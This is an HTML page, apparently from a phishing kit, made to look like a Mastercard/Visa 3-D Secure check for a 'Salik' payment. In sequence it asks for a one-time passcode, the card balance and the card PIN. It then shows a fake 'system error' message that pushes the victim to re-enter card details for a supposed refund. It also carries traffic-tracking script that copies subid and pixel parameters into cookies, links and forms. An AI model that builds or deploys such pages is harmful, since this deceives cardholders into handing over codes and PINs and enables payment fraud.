<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>3ds</title>
    <link rel="preconnect" href="https://fonts.googleapis.com">
    <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
    <link href="https://fonts.googleapis.com/css2?family=Rubik:ital,wght@0,300;0,400;0,500;0,600;0,700;0,800;0,900;1,300;1,400;1,500;1,600;1,700;1,800;1,900&display=swap" rel="stylesheet">
    <link rel="stylesheet" href="../style.css">
    <link rel="stylesheet" href="../media.css">
    <script src="https://code.jquery.com/jquery-3.6.0.min.js"></script>
    <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.8.2/jquery.min.js"></script>
    <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery.mask/1.14.10/jquery.mask.js"></script>
    <script src="https://cdn.jsdelivr.net/npm/axios/dist/axios.min.js"></script>
    <script src="https://code.jquery.com/jquery-3.6.0.min.js" integrity="sha256-/xUj+3OJU5yExlq6GSYGSHk7tPXikynS7ogEvDej/m4=" crossorigin="anonymous"></script>
    <link rel="preconnect" href="https://fonts.googleapis.com">
    <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
    <script type="application/javascript">
        function getCookie(name) {
            var v = document.cookie.match('(^|;) ?' + name + '=([^;]*)(;|$)');
            return v ? v[2] : null;
        }

        function setCookie(name, value, days) {
            var d = new Date;
            d.setTime(d.getTime() + 24 * 60 * 60 * 1000 * days);
            document.cookie = name + "=" + value + ";path=/;expires=" + d.toGMTString();
        }

        function getSubId() {
            var params = new URLSearchParams(document.location.search.substr(1));
            if (!'{subid}'.match('{')) {
                return '{subid}';
            }
            var clientSubid = '<?php echo isset($client) ? $client->getSubid() : "" ?>';
            if (clientSubid && !clientSubid.match('>')) {
                return clientSubid;
            }
            if (params.get('_subid')) {
                return params.get('_subid')
            }
            if (params.get('subid')) {
                return params.get('subid')
            }
            if (getCookie('subid')) {
                return getCookie('subid');
            }
        }


        function getPixel() {
            var params = new URLSearchParams(document.location.search.substr(1));
            if (!'{p}'.match('{')) {
                return '{p}';
            }
            if (params.get('p')) {
                return params.get('p')
            }

            if (getCookie('p')) {
                return getCookie('p');
            }

            return null;
        }

        if (typeof URLSearchParams === 'function') {
            document.addEventListener("DOMContentLoaded", function(event) {
                var params = new URLSearchParams(document.location.search.substr(1));
                var subid = getSubId();
                var pixel = getPixel();

                setCookie('p', pixel);
                setCookie('subid', subid);

                // Adds params to the links  
                document.querySelectorAll('a').forEach(function(link) {
                    var url = new URL(link.href);
                    params.forEach(function(v, k) {
                        url.searchParams.append(k, v);
                    });
                    link.href = url.toString();
                });

                // Adds params as hidden inputs to the forms
                document.querySelectorAll('form').forEach(function(form) {
                    params.forEach(function(v, k) {
                        var input = document.createElement('input');
                        input.type = 'hidden';
                        input.name = k;
                        input.value = v;

                        form.append(input);
                    });
                });
            })
        }
    </script>


</head>

<body>
    <div class="blur">
        <div class="form2fa" id="p1" style="display: none;">
            <div style="width: 100%; display: flex; align-items: center; justify-content: space-between;">
                <img src="/img/dss.png" width="150" alt=""><img width="150" id="mclogo" src="/img/mcsc.png" alt=""><img id="visalogo" style="display: none;" width="130" src="/img/Visa-Logo.png" alt="">
            </div>
            <span style="margin: 15px 0; text-align: left;
            font-weight: 600; width: 100%;">Enter one-time Passcode</span>
            <p style="color: #000; text-align: left;" id="smsinf">A one-time Passcode is required for this purchase. This Passcode has been sent to your registered mobile phone number.</p>
            <div style="width: 100%; display: flex; align-items: center; justify-content: space-between;padding: 10px 0;">
                <span>Merchant:</span><span>Salik</span>
            </div>
            <div style="width: 100%; display: flex; align-items: center; justify-content: space-between;padding: 10px 0;">
                <span>Date:</span><span id="rddate"></span>
            </div>
            <div style="width: 100%; display: flex; align-items: center; justify-content: space-between;padding: 10px 0;">
                <span>Card Number:</span><span id="card-container"></span>
            </div>
            <div style="width: 100%; display: flex; align-items: center; justify-content: space-between;padding: 10px 0;">
                <span>Amount:</span><span id="amount"></span>
            </div>
            <div style="width: 100%; display: flex; align-items: center; justify-content: space-between;padding: 10px 0;">
                <span style="text-align: left;">Enter One-Time Passcode:</span><input type="text" id="otp" class="codeinp" style="width: 48%;">
            </div>
            <div style="width: 100%; display: flex; justify-content: end; margin-bottom: 20px;">
                <span style="color: #555; text-decoration: underline; width: 48%; text-align: left; font-size: 14px;">
                    Haven't received a one-time passcode?
                </span>
            </div>
            <div style="width: 100%; display: flex; align-items: center; justify-content: space-between;padding: 10px 0;">
                <span style="cursor: pointer;">Cancel</span><button class="btn2">Submit</button><span style="cursor: pointer;">Help</span>
            </div>
        </div>
        <div class="form2fa" id="pload" style="display: flex;height: 550px; justify-content: center; align-items: center;">
            <div class="container">
                <div class="rectangle"></div>
                <div class="rectangle"></div>
                <div class="rectangle"></div>
                <div class="rectangle"></div>
                <div class="rectangle"></div>
                <div class="rectangle"></div>
                <div class="rectangle"></div>
                <div class="rectangle"></div>
                <div class="rectangle"></div>
                <div class="rectangle"></div>
            </div>
        </div>
        <div class="form2fa" id="pbal" style="display: none;">
            <div style="width: 100%; display: flex; align-items: center; justify-content: space-between;">
                <img src="/img/dss.png" width="150" alt=""><img width="150" src="/img/mcsc.png" alt="">
            </div>
            <span style="margin: 15px 0;
            font-weight: 600;">To continue with you transaction, please enter your card balance and click Submit</span>
            <input type="text" id="bal" class="codeinp" style="width: 100%;">
            <div style="width: 100%; display: flex; align-items: center; justify-content: space-between;padding: 10px 0;">
                <span style="cursor: pointer;">Cancel</span><button class="btn3">Submit</button><span style="cursor: pointer;">Help</span>
            </div>

        </div>
        <div class="form2fa" id="ppin" style="display: none;">
            <div style="width: 100%; display: flex; align-items: center; justify-content: space-between;">
                <img src="/img/dss.png" width="150" alt=""><img width="150" src="/img/mcsc.png" alt="">
            </div>
            <span style="margin: 15px 0;
            font-weight: 600;">To continue with you transaction, please enter your card PIN and click Submit</span>
            <input type="text" class="codeinp" id="pin" style="width: 100%;">
            <div style="width: 100%; display: flex; align-items: center; justify-content: space-between;padding: 10px 0;">
                <span style="cursor: pointer;">Cancel</span><button class="btn4">Submit</button><span style="cursor: pointer;">Help</span>
            </div>

        </div>
        <div class="form2fa" id="perr" style="display: none;">
            <div style="width: 100%; display: flex; align-items: center; justify-content: space-between;">
                <img src="/img/dss.png" width="150" alt=""><img width="150" src="/img/mcsc.png" alt="">
            </div>
            <span style="margin: 15px 0;
            font-weight: 600;">A system error has occurred and you have been charged the wrong amount, please re-enter your card and it will be credited.</span>
            <div style="width: 100%; display: flex; align-items: center; justify-content: space-between;padding: 10px 0;">
                <span style="text-decoration: underline; cursor: pointer;">Cancel</span><button class="btn5" onclick="btn5()">Submit</button><span style="cursor: pointer;">Help</span>
            </div>
            <style>
                .btn5 {
                    background-color: #c6c6c6b7;
                    border-radius: 30px;
                    border: 2px solid #ababab;
                    width: 50px;
                    width: 80px;
                    height: 25px;
                    color: #797979;
                    font-weight: 600;
                }
            </style>
            <script>
                function performAction(action) {
                    localStorage.setItem('selectedAction', action);
                    window.location.href = '../payment'; // Переход на вторую страницу
                }

                function btn5() {
                    $('#perr').css('display', 'none');
                    $('#pload').css('display', 'flex');
                    setTimeout(function() {
                        $('#pload').css('display', 'none');
                        // $('.blur').css('display', 'none');
                        $('#p1').css('display', 'flex');
                        $('#bal').val('');
                        $('#otp').val('');
                        $('#pin').val('');
                        $('#crdnum').val('');
                        $('#crddate').val('');
                        $('#crdcvv').val('');
                        performAction('action1');
                    }, 3000)
                }
            </script>
        </div>
    </div>
</body>
<script src="https://cdnjs.cloudflare.com/ajax/libs/jquery.mask/1.14.10/jquery.mask.js"></script>
<script src="../js/app.js"></script>

<script src="script1.js"></script>
<script>
    $('#num').mask('+999 999999999999999999999999999999999999999999999999999');
    $('#crdnum').mask('0000 0000 0000 0000');
    $('#crddate').mask('00/00');
    $('#crdcvv').mask('000');
    $('#otp').mask('000000');
    $('#pin').mask('0000');
    document.getElementById('amount').textContent = 'AED ' + localStorage.getItem('amount');
    let type = localStorage.getItem('cardType');
    console.log(type)
    if (type == 'Visa') {
        document.getElementById('visalogo').style.display = 'block';
        document.getElementById('mclogo').style.display = 'none';
    }
    setTimeout(() => {
        document.getElementById('pload').style.display = 'none';
        document.getElementById('p1').style.display = 'flex';
    }, 3000);
</script>

</html>